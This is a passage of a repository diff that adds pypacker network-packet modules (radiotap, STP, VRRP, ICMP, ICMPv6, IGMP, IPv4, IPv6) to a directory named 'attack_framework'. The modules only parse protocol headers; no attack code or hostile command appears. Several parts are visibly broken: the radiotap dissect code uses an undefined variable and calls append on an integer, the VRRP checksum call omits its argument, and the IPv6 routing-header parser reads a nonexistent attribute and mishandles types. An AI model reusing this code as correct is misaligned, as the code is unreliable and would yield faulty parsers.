+		try:
+			return self._fcs
+		except AttributeError:
+			return b""
+
+	def __set_fcs(self, fcs):
+		self._fcs = fcs
+
+	fcs = property(__get_fcs, __set_fcs)
+
+	def _dissect(self, buf):
+		flags = struct.unpack(">I", buf[4:8])[0]
+		fcs_present = False
+		off = 0
+		if flags & TSFT_MASK == TSFT_MASK:
+			off = 8
+
+		if flags & FLAGS_MASK == FLAGS_MASK and struct.unpack(">B", buf[off: off])[0] & 0x10 != 0:
+			logger.debug("fcs found")
+			fcs_present = True
+
+		pos_end = len(buf)
+
+		if fcs_present:
+			self._fcs = buf[-4:]
+			pos_end = -4
+			size_align = RADIO_FIELDS[mask]
+			size = size_align[0]
+			# check alignment
+			mod = off % size_align[1]
+
+			if mod != 0:
+				# enlarge size by alignment
+				size += (size_align[1] - mod)
+
+			# logger.debug("got flag %02X, length/align: %r" % (mask, size_align))
+			# add all fields for the stated flag
+			value = buf[off: off + size]
+
+			# FCS present?
+			if mask == FLAGS_MASK and struct.unpack(">B", value)[0] & 0x10 != 0:
+				# logger.debug("fcs found")
+				fcs_present = True
+
+			# logger.debug("adding flag: %s" % str(mask))
+			flags.append((mask, value))
+			off += size
+
+	def bin(self, update_auto_fields=True):
+		"""Custom bin(): handle FCS."""
+		return pypacker.Packet.bin(self, update_auto_fields=update_auto_fields) + self.fcs
+
+
+# load handler
+from pypacker.layer12 import ieee80211
+
+pypacker.Packet.load_handler(Radiotap,
+	{
+		RTAP_TYPE_80211: ieee80211.IEEE80211
+	}
+)

+ 20 - 0
attack_framework/pypacker/layer12/stp.py

@@ -0,0 +1,20 @@
+"""Spanning Tree Protocol."""
+
+from pypacker import pypacker
+
+
+class STP(pypacker.Packet):
+	__hdr__ = (
+		("proto_id", "H", 0),
+		("v", "B", 0),
+		("type", "B", 0),
+		("flags", "B", 0),
+		("root_id", "8s", b""),
+		("root_path", "I", 0),
+		("bridge_id", "8s", b""),
+		("port_id", "H", 0),
+		("age", "H", 0),
+		("max_age", "H", 0),
+		("hello", "H", 0),
+		("fd", "H", 0)
+	)

+ 40 - 0
attack_framework/pypacker/layer12/vrrp.py

@@ -0,0 +1,40 @@
+"""Virtual Router Redundancy Protocol."""
+
+from pypacker import pypacker, checksum
+
+
+class VRRP(pypacker.Packet):
+	__hdr__ = (
+		("vtype", "B", 0x21),
+		("vrid", "B", 0),
+		("priority", "B", 0),
+		("count", "B", 0),
+		("atype", "B", 0),
+		("advtime", "B", 0),
+		("sum", "H", 0),
+	)
+
+	def __get_v(self):
+		return self.vtype >> 4
+
+	def __set_v(self, v):
+		self.vtype = (self.vtype & ~0xf) | (v << 4)
+	v = property(__get_v, __set_v)
+
+	def __get_type(self):
+		return self.vtype & 0xf
+
+	def __set_type(self, v):
+		self.vtype = (self.vtype & ~0xf0) | (v & 0xf)
+	type = property(__get_type, __set_type)
+
+	def bin(self, update_auto_fields=True):
+		if update_auto_fields:
+			if self._changed():
+				# logger.debug(">>> IP: calculating sum")
+				# reset checksum for recalculation,  mark as changed / clear cache
+				self.sum = 0
+				# logger.debug(">>> IP: bytes for sum: %s" % self.header_bytes)
+				self.sum = checksum.in_cksum(pypacker.Packet.bin())
+
+		return pypacker.Packet.bin(self, update_auto_fields=update_auto_fields)

+ 0 - 0
attack_framework/pypacker/layer3/__init__.py


BIN
attack_framework/pypacker/layer3/__pycache__/__init__.cpython-33.pyc


BIN
attack_framework/pypacker/layer3/__pycache__/__init__.cpython-34.pyc


BIN
attack_framework/pypacker/layer3/__pycache__/esp.cpython-33.pyc


BIN
attack_framework/pypacker/layer3/__pycache__/esp.cpython-34.pyc


BIN
attack_framework/pypacker/layer3/__pycache__/icmp.cpython-33.pyc


BIN
attack_framework/pypacker/layer3/__pycache__/icmp.cpython-34.pyc


BIN
attack_framework/pypacker/layer3/__pycache__/icmp6.cpython-33.pyc


BIN
attack_framework/pypacker/layer3/__pycache__/icmp6.cpython-34.pyc


BIN
attack_framework/pypacker/layer3/__pycache__/igmp.cpython-33.pyc


BIN
attack_framework/pypacker/layer3/__pycache__/igmp.cpython-34.pyc


BIN
attack_framework/pypacker/layer3/__pycache__/ip.cpython-33.pyc


BIN
attack_framework/pypacker/layer3/__pycache__/ip.cpython-34.pyc


BIN
attack_framework/pypacker/layer3/__pycache__/ip6.cpython-33.pyc


BIN
attack_framework/pypacker/layer3/__pycache__/ip6.cpython-34.pyc


BIN
attack_framework/pypacker/layer3/__pycache__/ip_shared.cpython-33.pyc


BIN
attack_framework/pypacker/layer3/__pycache__/ip_shared.cpython-34.pyc


BIN
attack_framework/pypacker/layer3/__pycache__/ipx.cpython-33.pyc


BIN
attack_framework/pypacker/layer3/__pycache__/ipx.cpython-34.pyc


BIN
attack_framework/pypacker/layer3/__pycache__/ospf.cpython-33.pyc


BIN
attack_framework/pypacker/layer3/__pycache__/ospf.cpython-34.pyc


BIN
attack_framework/pypacker/layer3/__pycache__/pim.cpython-33.pyc


BIN
attack_framework/pypacker/layer3/__pycache__/pim.cpython-34.pyc


+ 10 - 0
attack_framework/pypacker/layer3/esp.py

@@ -0,0 +1,10 @@
+"""Encapsulated Security Protocol."""
+
+from pypacker import pypacker
+
+
+class ESP(pypacker.Packet):
+	__hdr__ = (
+		("spi", "I", 0),
+		("seq", "I", 0)
+	)

+ 127 - 0
attack_framework/pypacker/layer3/icmp.py

@@ -0,0 +1,127 @@
+"""Internet Control Message Protocol for IPv4."""
+
+from pypacker import pypacker, checksum
+
+import logging
+logger = logging.getLogger("pypacker")
+
+
+# Types (icmp_type) and codes (icmp_code) -
+# http://www.iana.org/assignments/icmp-parameters
+
+ICMP_CODE_NONE			= 0		# for types without codes
+ICMP_ECHOREPLY			= 0		# echo reply
+ICMP_UNREACH			= 3		# dest unreachable, codes:
+ICMP_UNREACH_NET		= 0		# bad net
+ICMP_UNREACH_HOST		= 1		# bad host
+ICMP_UNREACH_PROTO		= 2		# bad protocol
+ICMP_UNREACH_PORT		= 3		# bad port
+ICMP_UNREACH_NEEDFRAG		= 4		# IP_DF caused drop
+ICMP_UNREACH_SRCFAIL		= 5		# src route failed
+ICMP_UNREACH_NET_UNKNOWN	= 6		# unknown net
+ICMP_UNREACH_HOST_UNKNOWN	= 7		# unknown host
+ICMP_UNREACH_ISOLATED		= 8		# src host isolated
+ICMP_UNREACH_NET_PROHIB		= 9		# for crypto devs
+ICMP_UNREACH_HOST_PROHIB	= 10		# ditto
+ICMP_UNREACH_TOSNET		= 11		# bad tos for net
+ICMP_UNREACH_TOSHOST		= 12		# bad tos for host
+ICMP_UNREACH_FILTER_PROHIB	= 13		# prohibited access
+ICMP_UNREACH_HOST_PRECEDENCE	= 14		# precedence error
+ICMP_UNREACH_PRECEDENCE_CUTOFF	= 15		# precedence cutoff
+ICMP_SRCQUENCH			= 4		# packet lost, slow down
+ICMP_REDIRECT			= 5		# shorter route, codes:
+ICMP_REDIRECT_NET		= 0		# for network
+ICMP_REDIRECT_HOST		= 1		# for host
+ICMP_REDIRECT_TOSNET		= 2		# for tos and net
+ICMP_REDIRECT_TOSHOST		= 3		# for tos and host
+ICMP_ALTHOSTADDR		= 6		# alternate host address
+ICMP_ECHO			= 8		# echo service
+ICMP_RTRADVERT			= 9		# router advertise, codes:
+ICMP_RTRADVERT_NORMAL		= 0		# normal
+ICMP_RTRADVERT_NOROUTE_COMMON	= 16		# selective routing
+ICMP_RTRSOLICIT			= 10		# router solicitation
+ICMP_TIMEXCEED			= 11		# time exceeded, code:
+ICMP_TIMEXCEED_INTRANS		= 0		# ttl==0 in transit
+ICMP_TIMEXCEED_REASS		= 1		# ttl==0 in reass
+ICMP_PARAMPROB			= 12		# ip header bad
+ICMP_PARAMPROB_ERRATPTR		= 0		# req. opt. absent
+ICMP_PARAMPROB_OPTABSENT	= 1		# req. opt. absent
+ICMP_PARAMPROB_LENGTH		= 2		# bad length
+ICMP_TSTAMP			= 13		# timestamp request
+ICMP_TSTAMPREPLY		= 14		# timestamp reply
+ICMP_INFO			= 15		# information request
+ICMP_INFOREPLY			= 16		# information reply
+ICMP_MASK			= 17		# address mask request
+ICMP_MASKREPLY			= 18		# address mask reply
+ICMP_TRACEROUTE			= 30		# traceroute
+ICMP_DATACONVERR		= 31		# data conversion error
+ICMP_MOBILE_REDIRECT		= 32		# mobile host redirect
+ICMP_IP6_WHEREAREYOU		= 33		# IPv6 where-are-you
+ICMP_IP6_IAMHERE		= 34		# IPv6 i-am-here
+ICMP_MOBILE_REG			= 35		# mobile registration req
+ICMP_MOBILE_REGREPLY		= 36		# mobile registration reply
+ICMP_DNS			= 37		# domain name request
+ICMP_DNSREPLY			= 38		# domain name reply
+ICMP_SKIP			= 39		# SKIP
+ICMP_PHOTURIS			= 40		# Photuris
+ICMP_PHOTURIS_UNKNOWN_INDEX	= 0		# unknown sec index
+ICMP_PHOTURIS_AUTH_FAILED	= 1		# auth failed
+ICMP_PHOTURIS_DECOMPRESS_FAILED	= 2		# decompress failed
+ICMP_PHOTURIS_DECRYPT_FAILED	= 3		# decrypt failed
+ICMP_PHOTURIS_NEED_AUTHN	= 4		# no authentication
+ICMP_PHOTURIS_NEED_AUTHZ	= 5		# no authorization
+ICMP_TYPE_MAX			= 40
+
+
+class ICMP(pypacker.Packet):
+	__hdr__ = (
+		("type", "B", ICMP_ECHO),
+		("code", "B", 0),
+		("sum", "H", 0)
+	)
+
+	def bin(self, update_auto_fields=True):
+		# logger.debug("sum is: %d" % self.sum)
+		if update_auto_fields and self._changed():
+			# logger.debug("sum is: %d" % self.sum)
+			self.sum = 0
+			self.sum = checksum.in_cksum(self._pack_header() + self.body_bytes)
+			# logger.debug("sum is: %d" % self.sum)
+		return pypacker.Packet.bin(self, update_auto_fields=update_auto_fields)
+
+	def _dissect(self, buf):
+		# logger.debug("ICMP: adding fields for type: %d" % buf[0])
+		self._init_handler(buf[0], buf[4:])
+		return 4
+
+	class Echo(pypacker.Packet):
+		__hdr__ = (
+			("id", "H", 0),
+			("seq", "H", 1),
+			("ts", "d", 0)
+		)
+
+	class Unreach(pypacker.Packet):
+		__hdr__ = (
+			("pad", "H", 0),
+			("mtu", "H", 0)
+		)
+
+	class Redirect(pypacker.Packet):
+		__hdr__ = (
+			("gw", "I", 0),
+			("seq", "H", 0)
+		)
+
+# load handler
+ICMP_TYPE_ECHO		= (0, 8)
+ICMP_TYPE_UNREACH	= 3
+ICMP_TYPE_REDIRECT	= 5
+
+pypacker.Packet.load_handler(ICMP,
+	{
+		ICMP_TYPE_ECHO: ICMP.Echo,
+		ICMP_TYPE_UNREACH: ICMP.Unreach,
+		ICMP_TYPE_REDIRECT: ICMP.Redirect
+	}
+)

+ 84 - 0
attack_framework/pypacker/layer3/icmp6.py

@@ -0,0 +1,84 @@
+"""Internet Control Message Protocol for IPv6."""
+
+from pypacker import pypacker
+
+import logging
+
+logger = logging.getLogger("pypacker")
+
+ICMP6_DST_UNREACH		= 1		# dest unreachable, codes:
+ICMP6_PACKET_TOO_BIG		= 2		# packet too big
+ICMP6_TIME_EXCEEDED		= 3		# time exceeded, code:
+ICMP6_PARAM_PROB		= 4		# ip6 header bad
+
+ICMP6_ECHO_REQUEST		= 128		# echo service
+ICMP6_ECHO_REPLY		= 129		# echo reply
+MLD_LISTENER_QUERY		= 130		# multicast listener query
+MLD_LISTENER_REPORT		= 131		# multicast listener report
+MLD_LISTENER_DONE		= 132		# multicast listener done
+
+# RFC2292 decls
+ICMP6_MEMBERSHIP_QUERY		= 130		# group membership query
+ICMP6_MEMBERSHIP_REPORT		= 131		# group membership report
+ICMP6_MEMBERSHIP_REDUCTION	= 132		# group membership termination
+
+ND_ROUTER_SOLICIT		= 133		# router solicitation
+ND_ROUTER_ADVERT		= 134		# router advertisment
+ND_NEIGHBOR_SOLICIT		= 135		# neighbor solicitation
+ND_NEIGHBOR_ADVERT		= 136		# neighbor advertisment
+ND_REDIRECT			= 137		# redirect
+
+ICMP6_ROUTER_RENUMBERING	= 138		# router renumbering
+
+ICMP6_WRUREQUEST		= 139		# who are you request
+ICMP6_WRUREPLY			= 140		# who are you reply
+ICMP6_FQDN_QUERY		= 139		# FQDN query
+ICMP6_FQDN_REPLY		= 140		# FQDN reply
+ICMP6_NI_QUERY			= 139		# node information request
+ICMP6_NI_REPLY			= 140		# node information reply
+
+ICMP6_MAXTYPE			= 201
+
+
+class ICMP6(pypacker.Packet):
+	__hdr__ = (
+		("type", "B", 0),
+		("code", "B", 0),
+		("sum", "H", 0)
+	)
+
+	def _dissect(self, buf):
+		self._init_handler(buf[0], buf[4:])
+		return 4
+
+	class Error(pypacker.Packet):
+		__hdr__ = (("pad", "I", 0), )
+
+	class Unreach(Error):
+		pass
+
+	class TooBig(Error):
+		__hdr__ = (("mtu", "I", 1232), )
+
+	class TimeExceed(Error):
+		pass
+
+	class ParamProb(Error):
+		__hdr__ = (("ptr", "I", 0), )
+
+	class Echo(pypacker.Packet):
+		__hdr__ = (
+			("id", "H", 0),
+			("seq", "H", 0)
+		)
+
+pypacker.Packet.load_handler(ICMP6,
+	{
+		1: ICMP6.Unreach,
+		2: ICMP6.TooBig,
+		3: ICMP6.TimeExceed,
+		4: ICMP6.ParamProb,
+		128: ICMP6.Echo,
+		129: ICMP6.Echo
+	}
+)

+ 18 - 0
attack_framework/pypacker/layer3/igmp.py

@@ -0,0 +1,18 @@
+"""Internet Group Management Protocol."""
+
+from pypacker import pypacker, checksum
+
+
+class IGMP(pypacker.Packet):
+	__hdr__ = (
+		("type", "B", 0),
+		("maxresp", "B", 0),
+		("sum", "H", 0),
+		("group", "I", 0)
+	)
+
+	def bin(self, update_auto_fields=True):
+		if update_auto_fields and self._changed():
+			self.sum = 0
+			self.sum = checksum.in_cksum(pypacker.Packet.bin(self))
+		return pypacker.Packet.bin(self, update_auto_fields=update_auto_fields)

+ 223 - 0
attack_framework/pypacker/layer3/ip.py

@@ -0,0 +1,223 @@
+"""
+Internet Protocol version 4.
+
+RFC 791
+"""
+
+from pypacker import pypacker, triggerlist, checksum
+from pypacker.layer3.ip_shared import *
+
+import logging
+
+logger = logging.getLogger("pypacker")
+
+# avoid references for performance reasons
+in_cksum = checksum.in_cksum
+
+# IP options
+# http://www.iana.org/assignments/ip-parameters/ip-parameters.xml
+IP_OPT_EOOL			= 0
+IP_OPT_NOP			= 1
+IP_OPT_SEC			= 2
+IP_OPT_LSR			= 3
+IP_OPT_TS			= 4
+IP_OPT_ESEC			= 5
+IP_OPT_CIPSO			= 6
+IP_OPT_RR			= 7
+IP_OPT_SID			= 8
+IP_OPT_SSR			= 9
+IP_OPT_ZSU			= 10
+IP_OPT_MTUP			= 11
+IP_OPT_MTUR			= 12
+IP_OPT_FINN			= 13
+IP_OPT_VISA			= 14
+IP_OPT_ENCODE			= 15
+IP_OPT_IMITD			= 16
+IP_OPT_EIP			= 17
+IP_OPT_TR			= 18
+IP_OPT_ADDEXT			= 19
+IP_OPT_RTRALT			= 20
+IP_OPT_SDB			= 21
+IP_OPT_UNASSGNIED		= 22
+IP_OPT_DPS			= 23
+IP_OPT_UMP			= 24
+IP_OPT_QS			= 25
+IP_OPT_EXP			= 30
+
+
+class IPOptSingle(pypacker.Packet):
+	__hdr__ = (
+		("type", "B", 0),
+	)
+
+
+class IPOptMulti(pypacker.Packet):
+	"""
+	len = total length (header + data)
+	"""
+	__hdr__ = (
+		("type", "B", 0),
+		("len", "B", 2),
+	)
+
+	def bin(self, update_auto_fields=True):
+		if update_auto_fields:
+			self.len = len(self)
+		return pypacker.Packet.bin(self, update_auto_fields=update_auto_fields)
+
+
+class IP(pypacker.Packet):
+	__hdr__ = (
+		("v_hl", "B", 69),		# = 0x45
+		("tos", "B", 0),
+		("len", "H", 20),
+		("id", "H", 0),
+		("off", "H", 0),
+		("ttl", "B", 64),
+		("p", "B", IP_PROTO_TCP),
+		("sum", "H", 0),
+		("src", "4s", b"\x00" * 4),
+		("dst", "4s", b"\x00" * 4),
+		("opts", None, triggerlist.TriggerList)
+	)
+
+	def __get_v(self):
+		return self.v_hl >> 4
+
+	def __set_v(self, value):
+		self.v_hl = (value << 4) | (self.v_hl & 0xf)
+	v = property(__get_v, __set_v)
+
+	def __get_hl(self):
+		return self.v_hl & 0x0f
+
+	def __set_hl(self, value):
+		self.v_hl = (self.v_hl & 0xf0) | value
+	hl = property(__get_hl, __set_hl)
+
+	# Convenient access for: src[_s], dst[_s]
+	src_s = pypacker.get_property_ip4("src")
+	dst_s = pypacker.get_property_ip4("dst")
+
+	def _dissect(self, buf):
+		total_header_length = ((buf[0] & 0xf) << 2)
+		options_length = total_header_length - 20		# total IHL - standard IP-len = options length
+
+		if options_length < 0:
+			# invalid header length: assume no options at all
+			raise Exception("invalid header length: %d" % options_length)
+		elif options_length > 0:
+			# logger.debug("got some IP options: %s" % tl_opts)
+			self._init_triggerlist("opts", buf[20: 20 + options_length], self.__parse_opts)
+
+		self._init_handler(buf[9], buf[total_header_length:])
+		return total_header_length
+
+	__IP_OPT_SINGLE = set([IP_OPT_EOOL, IP_OPT_NOP])
+
+	@staticmethod
+	def __parse_opts(buf):
+		"""Parse IP options and return them as List."""
+		optlist = []
+		i = 0
+		p = None
+
+		while i < len(buf):
+			# logger.debug("got IP-option type %s" % buf[i])
+			if buf[i] in IP.__IP_OPT_SINGLE:
+				p = IPOptSingle(type=buf[i])
+				i += 1
+			else:
+				olen = buf[i + 1]
+				# logger.debug("IPOptMulti")
+				p = IPOptMulti(type=buf[i], len=olen, body_bytes=buf[i + 2: i + olen])
+				# logger.debug("body bytes: %s" % buf[i + 2: i + olen])
+				i += olen		# typefield + lenfield + data-len
+				# logger.debug("IPOptMulti 2")
+			optlist.append(p)
+		return optlist
+
+	def bin(self, update_auto_fields=True):
+		if update_auto_fields:
+			if self._changed():
+				self.len = len(self)
+				# length changed so we have to recalculate checksum
+				# logger.debug("updating checksum")
+				# logger.debug(">>> IP: calculating sum")
+				# reset checksum for recalculation,  mark as changed / clear cache
+				self.sum = 0
+				# Update header length. NOTE: needs to be a multiple of 4 Bytes.
+				# logger.debug("updating: %r" % self._packet)
+				# options length need to be multiple of 4 Bytes
+				self._hl = int(self.header_len / 4) & 0xf
+				# logger.debug(">>> IP: bytes for sum: %s" % self.header_bytes)
+				self.sum = in_cksum(self._pack_header())
+				# logger.debug("IP: new hl: %d / %d" % (self._packet.hdr_len, hdr_len_off))
+				# logger.debug("new sum: %0X" % self.sum)
+				# logger.debug("new sum: %d" % self.sum)
+
+		return pypacker.Packet.bin(self, update_auto_fields=update_auto_fields)
+
+	def direction(self, other):
+		# logger.debug("checking direction: %s<->%s" % (self, next))
+		# TODO: handle broadcast
+		if self.src == other.src and self.dst == other.dst:
+			# consider packet to itself: can be DIR_REV
+			return pypacker.Packet.DIR_SAME | pypacker.Packet.DIR_REV
+		elif self.src == other.dst and self.dst == other.src:
+			return pypacker.Packet.DIR_REV
+		else:
+			return pypacker.Packet.DIR_UNKNOWN
+
+	def reverse_address(self):
+		self.src, self.dst = self.dst, self.src
+
+
+# Type of service (ip_tos), RFC 1349 ("obsoleted by RFC 2474")
+IP_TOS_DEFAULT			= 0x00			# default
+IP_TOS_LOWDELAY			= 0x10			# low delay
+IP_TOS_THROUGHPUT		= 0x08			# high throughput
+IP_TOS_RELIABILITY		= 0x04			# high reliability
+IP_TOS_LOWCOST			= 0x02			# low monetary cost - XXX
+IP_TOS_ECT			= 0x02			# ECN-capable transport
+IP_TOS_CE			= 0x01			# congestion experienced
+
+# IP precedence (high 3 bits of ip_tos), hopefully unused
+IP_TOS_PREC_ROUTINE		= 0x00
+IP_TOS_PREC_PRIORITY		= 0x20
+IP_TOS_PREC_IMMEDIATE		= 0x40
+IP_TOS_PREC_FLASH		= 0x60
+IP_TOS_PREC_FLASHOVERRIDE	= 0x80
+IP_TOS_PREC_CRITIC_ECP		= 0xa0
+IP_TOS_PREC_INTERNETCONTROL	= 0xc0
+IP_TOS_PREC_NETCONTROL		= 0xe0
+
+# Fragmentation flags (ip_off)
+IP_RF				= 0x8000		# reserved
+IP_DF				= 0x4000		# don't fragment
+IP_MF				= 0x2000		# more fragments (not last frag)
+IP_OFFMASK			= 0x1fff		# mask for fragment offset
+
+# Time-to-live (ip_ttl), seconds
+IP_TTL_DEFAULT			= 64			# default ttl, RFC 1122, RFC 1340
+IP_TTL_MAX			= 255			# maximum ttl
+
+# load handler
+from pypacker.layer3 import esp, icmp, igmp, ip6, ipx, ospf, pim
+from pypacker.layer4 import tcp, udp, sctp
+
+pypacker.Packet.load_handler(IP,
+	{
+		IP_PROTO_IP: IP,
+		IP_PROTO_ICMP: icmp.ICMP,
+		IP_PROTO_IGMP: igmp.IGMP,
+		IP_PROTO_TCP: tcp.TCP,
+		IP_PROTO_UDP: udp.UDP,
+		IP_PROTO_IP6: ip6.IP6,
+		IP_PROTO_ESP: esp.ESP,
+		IP_PROTO_PIM: pim.PIM,
+		IP_PROTO_IPXIP: ipx.IPX,
+		IP_PROTO_SCTP: sctp.SCTP,
+		IP_PROTO_OSPF: ospf.OSPF
+	}
+)

+ 262 - 0
attack_framework/pypacker/layer3/ip6.py

@@ -0,0 +1,262 @@
+"""
+Internet Protocol version 6..for whoever needs it (:
+
+RFC 2460
+"""
+
+from pypacker import pypacker, triggerlist
+from pypacker.layer3.ip_shared import *
+
+import logging
+logger = logging.getLogger("pypacker")
+
+# TODO: to be implemented
+# Encapsulation Security Payload Header = 50
+# IP_PROTO_MOBILITY	= 135
+# IP_PROTO_NONEXT	= 59
+
+
+ext_hdrs = set([
+		IP_PROTO_HOPOPTS,
+		IP_PROTO_ROUTING,
+		IP_PROTO_FRAGMENT,
+		IP_PROTO_AH,
+		IP_PROTO_ESP,
+		IP_PROTO_DSTOPTS,
+		# TODO: to be implemented
+		# IP_PROTO_MOBILITY
+		# IP_PROTO_NONEXT
+	])
+
+
+class IP6(pypacker.Packet):
+	__hdr__ = (
+		("v_fc_flow", "I", 0x60000000),
+		("dlen", "H", 0),		# payload length (not including standard header)
+		("nxt", "B", 0),		# next header protocol
+		("hlim", "B", 0),		# hop limit
+		("src", "16s", b"\x00" * 16),
+		("dst", "16s", b"\x00" * 16),
+		("opts", None, triggerlist.TriggerList)
+	)
+
+	def __get_v(self):
+		return self.v_fc_flow >> 28
+
+	def __set_v(self, v):
+		self.v_fc_flow = (self.v_fc_flow & ~0xf0000000) | (v << 28)
+	v = property(__get_v, __set_v)
+
+	def __get_fc(self):
+		return (self.v_fc_flow >> 20) & 0xff
+
+	def __set_fc(self, v):
+		self.v_fc_flow = (self.v_fc_flow & ~0xff00000) | (v << 20)
+	fc = property(__get_fc, __set_fc)
+
+	def __get_flow(self):
+		return self.v_fc_flow & 0xfffff
+
+	def __set_flow(self, v):
+		self.v_fc_flow = (self.v_fc_flow & ~0xfffff) | (v & 0xfffff)
+	flow = property(__get_flow, __set_flow)
+
+	def _dissect(self, buf):
+		type_nxt = buf[6]
+		off = 40
+		opts = []
+
+		# logger.debug("parsing opts from bytes (dst: %s): (len: %d) %s" % (buf[24:40], self.hdr_len, buf[off:]))
+		# parse options until type is an upper layer one
+		while type_nxt in ext_hdrs:
+			length = 8 + buf[off + 1] * 8
+			# logger.debug("next type is: %s, len: %d, %r" % (type_nxt, length, buf[off:off + length]))
+			opt = ext_hdrs_cls[type_nxt](buf[off:off + length])
+			opts.append(opt)
+			type_nxt = buf[off]
+			off += length
+
+		# TODO: lazy dissect possible?
+		self.opts.extend(opts)
+		# IPv6 and IPv4 share same handler
+		self._init_handler(type_nxt, buf[off:])
+		# TODO: return length without parsing everything
+		return off
+
+	def direction(self, other):
+		# logger.debug("checking direction: %s<->%s" % (self, next))
+		if self.src == other.src and self.dst == other.dst:
+			# consider packet to itself: can be DIR_REV
+			return pypacker.Packet.DIR_SAME | pypacker.Packet.DIR_REV
+		elif self.src == other.dst and self.dst == other.src:
+			return pypacker.Packet.DIR_REV
+		else:
+			return pypacker.Packet.DIR_UNKNOWN
+
+	def reverse_address(self):
+		self.src, self.dst = self.dst, self.src
+
+
+#
+# Basic shared option classes
+#
+class IP6OptsHeader(pypacker.Packet):
+	__hdr__ = (
+		("nxt", "B", 0),		# next extension header protocol
+		("len", "B", 0),		# option data length in 8 octect units (ignoring first 8 octets) so, len 0 == 64bit header
+		("opts", None, triggerlist.TriggerList)
+	)
+
+	def _dissect(self, buf):
+		length = 8 + buf[1] * 8
+		options = []
+		off = 2
+
+		# TODO: check https://code.google.com/p/pypacker/issues/attachmentText?id=72
+		while off < length:
+			opt_type = buf[off]
+			# logger.debug("IP6OptsHeader: type: %d" % opt_type)
+
+			# http://tools.ietf.org/html/rfc2460#section-4.2
+			# PAD1 option: no length or data field
+			if opt_type == 0:
+				opt = IP6OptionPad(type=opt_type)
+				# logger.debug("next ip6 bytes 1: %r" % (buf[off:off + 2]))
+				off += 1
+			else:
+				opt_len = buf[off + 1]
+				opt = IP6Option(type=opt_type, len=opt_len, body_bytes=buf[off + 2: off + 2 + opt_len])
+				# logger.debug("next ip6 bytes 2: %r" % (buf[off + 2: off + 2 + opt_len]))
+				off += 2 + opt_len
+			options.append(opt)
+
+		self.opts.extend(options)
+		return off
+
+
+class IP6Option(pypacker.Packet):
+	__hdr__ = (
+		("type", "B", 0),
+		("len", "B", 0)
+	)
+
+
+class IP6OptionPad(pypacker.Packet):
+	__hdr__ = (
+		("type", "B", 0),
+	)
+
+
+class IP6HopOptsHeader(IP6OptsHeader):
+	def _dissect(self, buf):
+		# logger.debug("IP6HopOptsHeader parsing")
+		return IP6OptsHeader._dissect(self, buf)
+
+
+class IP6RoutingHeader(pypacker.Packet):
+	__hdr__ = (
+		("nxt", "B", 0),			# next extension header protocol
+		("len", "B", 0),			# extension data length in 8 octect units (ignoring first 8 octets) (<= 46 for type 0)
+		("type", "B", 0),			# routing type (currently, only 0 is used)
+		("segs_left", "B", 0),			# remaining segments in route, until destination (<= 23)
+		("rsvd_sl_bits", "I", 0),		# reserved (1 byte), strict/loose bitmap for addresses
+		("addresses", None, triggerlist.TriggerList)
+	)
+
+	def __get_sl_bits(self):
+		return self.rsvd_sl_bits & 0xffffff
+
+	def __set_sl_bits(self, v):
+		self.rsvd_sl_bits = (self.rsvd_sl_bits & ~0xfffff) | (v & 0xfffff)
+	sl_bits = property(__get_sl_bits, __set_sl_bits)
+
+	def _dissect(self, buf):
+		hdr_size = 8
+		addr_size = 16
+		addresses = []
+		num_addresses = self.buf[1] / 2
+
+		buf = buf[hdr_size:hdr_size + num_addresses * addr_size]
+
+		# logger.debug("IP6RoutingHeader: parsing addresses")
+		for i in range(num_addresses):
+			addresses.append(buf[i * addr_size: i * addr_size + addr_size])
+
+		self.addresses.extend(addresses)
+		return len(num_addresses) * addr_size + addr_size
+		# setattr(self, "addresses", addresses)
+		# setattr(self, "length", self.len * 8 + 8)
+
+
+class IP6FragmentHeader(pypacker.Packet):
+	__hdr__ = (
+		("nxt", "B", 0),			# next extension header protocol
+		("resv", "B", 0),			# reserved, set to 0
+		("frag_off_resv_m", "H", 0),		# frag offset (13 bits), reserved zero (2 bits), More frags flag
+		("id", "I", 0)				# fragments id
+	)
+
+	def __get_frag_off(self):
+		return self.frag_off_resv_m >> 3
+
+	def __set_frag_off(self, v):
+		self.frag_off_resv_m = (self.frag_off_resv_m & ~0xfff8) | (v << 3)
+	frag_off = property(__get_frag_off, __set_frag_off)
+
+	def __get_m_flag(self):
+		return self.frag_off_resv_m & 1
+
+	def __set_m_flag(self, v):
+		self.frag_off_resv_m = (self.frag_off_resv_m & ~0xfffe) | v
+	m_flag = property(__get_m_flag, __set_m_flag)
+
+
+class IP6AHHeader(pypacker.Packet):
+	__hdr__ = (
+		("nxt", "B", 0),			 # next extension header protocol
+		("len", "B", 0),			 # length of header in 4 octet units (ignoring first 2 units)
+		("resv", "H", 0),			 # reserved, 2 bytes of 0
+		("spi", "I", 0),			 # SPI security parameter index
+		("seq", "I", 0)				 # sequence no.
+	)
+
+
+class IP6ESPHeader(pypacker.Packet):
+	def _dissect(self, buf):
+		raise NotImplementedError("ESP extension headers are not supported.")
+
+
+class IP6DstOptsHeader(IP6OptsHeader):
+	def _dissect(self, buf):
+		# logger.debug("IP6DstOptsHeader parsing")
+		IP6OptsHeader._dissect(self, buf)
+
+ext_hdrs_cls = {
+		IP_PROTO_HOPOPTS: IP6HopOptsHeader,
+		IP_PROTO_ROUTING: IP6RoutingHeader,
+		IP_PROTO_FRAGMENT: IP6FragmentHeader,
+		IP_PROTO_ESP: IP6ESPHeader,
+		IP_PROTO_AH: IP6AHHeader,
+		IP_PROTO_DSTOPTS: IP6DstOptsHeader
+		# IP_PROTO_MOBILITY:
+		# IP_PROTO_NONEXT:
+}
+
+# load handler
+from pypacker.layer3 import esp, icmp6, igmp, ipx, ospf, pim
+from pypacker.layer4 import tcp, udp, sctp
+
+pypacker.Packet.load_handler(IP6,
+	{
+		IP_PROTO_ICMP6: icmp6.ICMP6,
+		IP_PROTO_IGMP: igmp.IGMP,
+		IP_PROTO_TCP: tcp.TCP,
+		IP_PROTO_UDP: udp.UDP,
+		IP_PROTO_IP6: IP6,
+		IP_PROTO_ESP: esp.ESP,
+		IP_PROTO_PIM: pim.PIM,
+		IP_PROTO_IPXIP: ipx.IPX,
+		IP_PROTO_SCTP: sctp.SCTP,
+		IP_PROTO_OSPF: ospf.OSPF
+	}
+)

+ 141 - 0
attack_framework/pypacker/layer3/ip_shared.py

@@ -0,0 +1,141 @@
+"""Shared constants for IPv4 and IPv6."""
+
+# Protocol numbers - http://www.iana.org/assignments/protocol-numbers
+IP_PROTO_IP		= 0			# dummy for IP
+IP_PROTO_HOPOPTS	= IP_PROTO_IP		# IPv6 hop-by-hop options
+IP_PROTO_ICMP		= 1			# ICMP
